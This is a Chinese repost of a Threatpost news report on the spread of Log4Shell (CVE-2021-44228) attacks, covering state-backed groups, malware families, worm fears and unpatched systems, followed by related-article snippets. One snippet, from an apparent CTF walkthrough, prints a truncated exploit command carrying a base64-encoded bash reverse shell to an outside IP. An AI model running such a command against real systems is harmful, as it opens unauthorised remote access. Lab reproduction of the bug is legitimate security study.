无情的 Log4j 攻击包括状态参与者、可能的蠕虫

最新推荐文章于 2024-06-03 15:52:37 发布
最新推荐文章于 2024-06-03 15:52:37 发布
阅读量279 收藏
点赞数
文章标签: 网络 安全
原文链接:https://lexiangla.com/docs/022a1e405e5611eca8a9ae26697c2872?company_from=fed07460589c11ec971f965d636e5773
版权

已经针对一半的企业网络发起了超过 180 万次攻击以利用 Log4Shell。

称其为威胁的“僵局”:包括民族国家行为者在内的攻击者已经使用至少 70 个不同的恶意软件系列将安全公司遥测中的所有企业全球网络的一半作为目标——而 Log4j 漏洞的影响才刚刚开始。

过去几天,世界各地的键盘研究人员一直在追踪针对现在臭名昭著的 Log4j Java 库错误的攻击,该错误被称为Log4Shell (CVE-2021-44228)。旁注:Log4j 发音为“log forge”——尽管这是有争议的,因为它在对话中也被称为“log-four-jay”。经销商的选择在那里。

上周首次在 Minecraft 玩家中发现,新发现的漏洞为威胁行为者劫持服务器提供了巨大的机会,主要是使用硬币矿工和僵尸网络,但也有大量其他恶意软件,例如StealthLoader 木马——而且仅此而已

Rapid7 的人工智能研究员 Erick Galinkin 告诉 Threatpost:“我们在暗网论坛上看到了很多讨论,包括共享扫描仪、绕过和漏洞利用。” “此时,我们和其他安全研究人员已经确定了 70 多个不同的恶意软件家族。”

例如,Bitdefender 研究人员本周发现,攻击者正试图利用 Log4Shell 向 Windows 计算机提供一种名为 Khonsari 的新型勒索软件。

Check Point 研究周三报告称,自上周五以来,其团队已在他们跟踪的几乎一半的公司网络上检测到 180 万次 Log4j漏洞利用尝试

这些威胁行为者不是低技能的业余爱好者。Check Point 补充说,截至周三,伊朗黑客组织 Charming Kitten,也被称为 APT 35,被广泛认为是一个民族国家行为者,正在积极针对政府和商业部门的七个特定以色列组织。

“我们过去 48 小时的报告证明,犯罪黑客组织和民族国家行为者都在探索这个漏洞,我们都应该假设未来几天会有更多此类行为者的操作被揭露,”Check Point添加。

微软同时报告称,民族国家组织 Phosphorus(伊朗)和Hafnium(中国)以及来自朝鲜和土耳其的未命名 APT 正在积极利用 Log4Shell (CVE-2021-44228) 进行针对性攻击。Hafnium 以 3 月份的 ProxyLogon 零日攻击 Exchange 服务器而闻名,而 Phosphorus 则成为2020 年全球峰会和会议的头条新闻

该公司在一篇帖子中表示:“这项活动的范围从开发过程中的实验、漏洞的集成到野外有效载荷的部署和针对目标的利用,以实现参与者的目标。”

下一个是 Log4j 蠕虫吗?

与此同时,研究员 Greg Linares 报告说,看到有证据表明正在开发一种自我传播的蠕虫,并且可能会在一天或更短的时间内出现。

网络安全社区内普遍认为他是正确的,但许多专家认为 Log4j 的后果不会像过去的WannaCry 或 NotPetya事件那样糟糕

Digital Shadows 的高级网络威胁情报分析师 Chris Morgan 表示:“虽然我们可能会看到一种蠕虫在易受影响的 Log4j 设备之间传播,但目前还没有任何证据表明这是威胁行为者的优先事项。” ,告诉 Threatpost。“开发这种性质的恶意软件需要花费大量的时间和精力。”

“这项活动与 WannaCry 事件不同,后者见证了一个高度可利用的漏洞的完美风暴,同时在 EternalBlue 中发生了 NSA 级别的漏洞利用漏洞,”摩根补充道。

“对于 Log4j 来说,现在还为时过早,”Morgan 说。“虽然许多威胁行为者可能处于杀伤链的不同阶段,但大多数行为者可能仍在扫描易受攻击的系统,试图建立立足点,并根据他们的动机确定更多机会。现阶段的参与者正在努力在公司有机会修补之前急于利用,而不是花时间开发蠕虫。”

来自 Salt Security 的 Yaniv Balmas 等研究人员向 Threatpost 解释说,Log4j 蠕虫的出现并不是最坏的情况。

“虽然没有忽视这种蠕虫的影响,但这可能不是最糟糕的情况,因为这种攻击的应用非常容易,”巴尔马斯说。“拥有基本计算机和互联网访问权限的每个人都可以在几分钟内对数百万在线服务发起攻击。这与蠕虫产生的影响非常相似——它是分布式且不可预测的,由于蠕虫以自动方式‘盲目地’工作,破坏程度甚至可能比蠕虫还要高。”

他补充说,“在另一种情况下,攻击背后有真正的人,这些攻击可能针对特定实体或机构,并使攻击者能够随着攻击的进行微调。”

根据 Netenrich 的 John Bambanek 的说法,安全团队为防止漏洞利用修补 Log4j所做的不懈努力对防止出现任何蠕虫的发展有很大帮助。

“这个漏洞当然看起来很容易被感染,但是,好消息是我们已经有将近一周的时间开始处理检测、缓解和修补问题,”Bambenek 告诉 Threatpost。“那里会有很多易受攻击的机器,但到目前为止,已经处理了大量易受攻击的机器,还有更多机器受到 Web 应用程序防火墙 (WAF) 规则的保护(例如,周末部署了 Cloudflare 保护)。最坏的情况是上周出现了蠕虫,我们现在情况好多了。”

Log4j 的长尾

除了紧急修补措施之外,Galinkin 向 Threatpost 解释说,他担心的是,在 Log4j 脱离头条新闻很久之后,未修补的设备和系统仍然存在,特别是在学术界和医疗保健等领域。

“关于这个漏洞,需要注意的一个关键点是它会有一个非常长的尾巴,”他说。“医院往往只购买一次软件,但有时供应商会倒闭——导致不受支持的软件永远不会收到补丁。”

他补充说,“在学术界,大量的软件是由研究生或教授编写的,但这些人可能没有意识到这个错误,或者他们只是不再维护软件——在物理学、药理学和生物信息学中使用的软件. 这表明,在很长一段时间内,我们将继续看到对该漏洞的利用——可能是在孤立的事件中——。”

ZY_Eliza
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
下一波Log4J攻击来势汹汹
m0_65135736的博客
12-29 2066
到目前为止,Log4Shell的影响主要在于加密货币挖矿和少数间谍活动,而真正的灾难就在眼前。 一周前,互联网经历了一场地震。由于广为使用的开源库Log4j存在一个漏洞,世界各地的大量服务器瞬间暴露在并不高明的攻击手段之下。第一波黑客攻击已经全面铺开,但接下来的走势才是更需要担心的。 到目前为止,Log4j黑客的先锋队主要是加密货币挖矿软件,这些恶意软件从受影响的系统中抽取资源来挖取加密货币。根据微软和其他公司的近期报告,一些民族国家的间谍也涉足其中。近两年来常见的敲诈行为、勒索软件和破坏性攻击在本次事
这家公司因Log4j漏洞惨遭黑客攻击并勒索500万美元
热门推荐
weixin_64917227的博客
12-30 2万+
从本月9号Apache Log4j2 漏洞曝光引发轩然大波以来,网络安全研究人员不是在修Bug的路上,就是在发补丁的途中。Log4j也成了本月讨论度最高的热词之一。 最近,越南最大的加密交易平台之一 —— ONUS,因其支付系统运行的Log4j版本存在漏洞而遭到黑客攻击。很快,黑客找到ONUS,向其勒索500万美元,并威胁说如果ONUS拒绝支付,他们就在网上公布ONUS的客户数据。ONUS拒绝了这个勒索,于是黑客就在论坛上公开销售了近200万ONUS客户的数据。 支付软件运行的Log4j版本存在漏洞
log4j反序列化漏洞复现
qq_52263650的博客
05-31 884
Apache Log4j 是一个用于 Java 的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2 之前的 2.x 版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。
Web网络安全-----Log4j高危漏洞原理及修复_log4j漏洞是什么
最新发布
weixin_42340783的博客
06-03 1218
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。
Web网络安全-----Log4j高危漏洞原理及修复
qq_51690690的博客
07-27 1万+
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。提示:以下是本篇文章正文内容,下面案例可供参考。
如何强化应用安全能力,全面拦截 Log4j 漏洞攻击
yz_weixiao的博客
01-16 275
最近几天对于很多开发者而言,只能用争分夺秒与胆战心惊来形容。而造成这一切的源头,来自于被公布的 Apache Log4j2 远程代码执行漏洞(CNVD-2021-95914)。当前几乎所有技术巨头都在使用该开源组件,其危害将带来一连串连锁反应。据行业机构不完全统计,该漏洞影响 6w+ 流行开源软件,影响 70% 以上的企业线上业务系统!漏洞波及面、危害程度均堪比 2017 年的让数百万台主机面临被勒索病毒攻击的风险的“永恒之蓝”漏洞。
记录一次针对log4j的jndi注入攻击
大兵的博客
12-16 3557
事件经过 今天一到公司就被钉钉监控报警群@了,报错类型如下图所示: com.mysql.jdbc.MysqlDataTruncation:Data truncation:Data too long for column这个错误很常见,就是插入数据到数据库中,字段长度超过了数据库限制的长度。 于是我就去skywalking上找日志,看到底是什么参数超过了长度限制,于是我找到了报错的链路看到了网关打印的日志信息如下: 重点看我红线框出的部分,这一看就不是一个正常的传参,看起来像是某种攻击。 由此让我联想到,
log4j-2.18.0
08-04
总的来说,log4j2的安全漏洞提醒我们,即使是看似不那么显眼的日志组件,也可能成为攻击者利用的入口。及时跟进安全更新,严格管理代码库,以及持续进行安全审计,是每个开发者和运维人员都应重视的基本操作。只有...
扫描log4j2 版本扫描log4j2 版本
12-16
然而,随着技术的发展,某些版本的Log4j2被发现存在严重的安全漏洞,这使得恶意攻击者有可能利用这些漏洞进行远程代码执行(RCE)攻击,对系统造成严重威胁。因此,"扫描log4j2版本"是确保系统安全的关键步骤。 ...
log4j2.17.2
04-14
Log4j2漏洞(CVE-2021-44228)的本质在于,攻击者可以通过操纵日志输入,触发JNDI(Java Naming and Directory Interface)查询,进而执行任意远程代码。这个漏洞的严重性在于,它允许攻击者无需任何权限即可完全...
Log4j2结合Slf4j配置使用
12-10
Log4j2 结合 Slf4j 配置使用 Log4j2 是一个功能强大且广泛使用的日志记录工具,它提供了灵活的日志记录机制和高性能的日志记录能力。Slf4j 则是一个简单的日志记录门面,提供了统一的日志记录接口。今天,我们将...
log4j使用详细解析
08-29
Log4j 除了可以记录程序运行日志信息外还有一重要的功能就是用来显示调试信息。下面通过本文给大家介绍log4j使用详细解析,感兴趣的朋友一起看看吧
老生常谈Log4jLog4j2的区别(推荐)
08-30
下面我们将从配置文件类型、核心JAR包、文件渲染和Log调用四个方面来比较Log4jLog4j2的区别。 配置文件类型 Log4j通过一个.properties文件作为主配置文件,而Log4j2则弃用了这种方式,采用的是.xml、.json或者....
log4j漏洞原理及攻击流程
weixin_54603520的博客
05-14 2357
log4j漏洞最早出现在2021年11月24日一位阿里安全团队的员工发现的,上报到Apache之后,12月10日凌晨才被公开。该漏洞威胁等级较高。基本比肩与阿里当年的fastjson漏洞。
Log4j2原理、攻击和解决方案来聊聊这次全球性的Log4j2漏洞
ixxqq的博客
12-16 449
本文分四个方面来说说Log4j2的相关问题1、Log4j2原理2、如何利用漏洞进行攻击3、解决方案4、带来的思考。此次漏洞影响面之广足以载入安全史册,Log4j2凭借一己之力让全球程序员过...
JAVA安全--log4j漏洞研究分析
goddemon
03-12 1万+
log4j漏洞复现 复现 这里以bugku上的靶场为例进行复现 https://ctf.bugku.com/challenges/detail/id/340.html 环境配置 ①ldap服务 服务器起一个ldap服务就好了 直接执行反弹shell 即直接配置bash反弹shell命令 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84Mi4xNTYuM
log4j漏洞是什么
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
02-18 1468
log4j漏洞是什么,Log4j 是一款开源软件,开发者已经将其集成到数百万个系统中。这种无孔不入、无处不在的软件中的漏洞有能力影响全世界的公司和组织(包括政府)。自从2021年11月曝光的Log4j漏洞已成为一大“持续性流行漏洞”,将在未来多年引发持续风险,换言之,这种无所不在的软件库的未经修复版本,将在未来十年或更长时间内继续留存在各类系统当中。同时,美国网络安全审查委员会预测,鉴于 Log4j的普遍存在,在未来十年中,易受攻击的版本仍将存在于系统中,我们将看到利用漏洞的方式不断演变,所有组织都应具备发
Apache Log4j漏洞已经发生一个月了,总结一下它的影响和风险
par@ish的博客
01-10 3865
2021年12月9日,关于apache log4j漏洞存在开始在一些网络安全论坛流传,也有一种说法是阿里的网络安全专家最早发现,并提交给了apache 基金会。不论谁最早发现,这个漏洞因为广泛存在而成为一个史诗级,现象级。 Log4j是apache 的一段代码,它是java语言的一部分,而大量的计算机代码使用 Java 并包含 log4j。log for java。 log4j可以帮助web、app记录日志,因为它是免费的,很多开发人员都广泛采用它来记录日志。这也就是log4j被广泛使用的原因。 而利用这个
严重危害警告!Log4j 执行漏洞被公开!
yz_weixiao的博客
01-12 223
12 月 10 日凌晨,Apache 开源项目 Log4j2 的远程代码执行漏洞细节被公开,漏洞威胁等级为:严重。Log4j2 是一个基于 Java 的日志记录工具。它重写了 Log4j 框架,引入了大量丰富特性,让用户可以控制日志信息输送的目的地为控制台、文件、GUI 组件等。同时通过定义每一条日志信息的级别,让使用者能够更加细致地控制日志的生成过程。Log4j 是目前全球使用最广泛的 java 日志框架之一。
Apache Log4j详解:Pro Apache Log4j Second Edition精华
"《log4j的参考手册——Pro Apache Log4j Second Edition》是由Samudra Gupta撰写的一本关于log4j的专业指南。作者拥有深厚的Java和J2EE背景,他在书中分享了其在公共税务、国家安全系统、零售工业及电子商务应用等...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值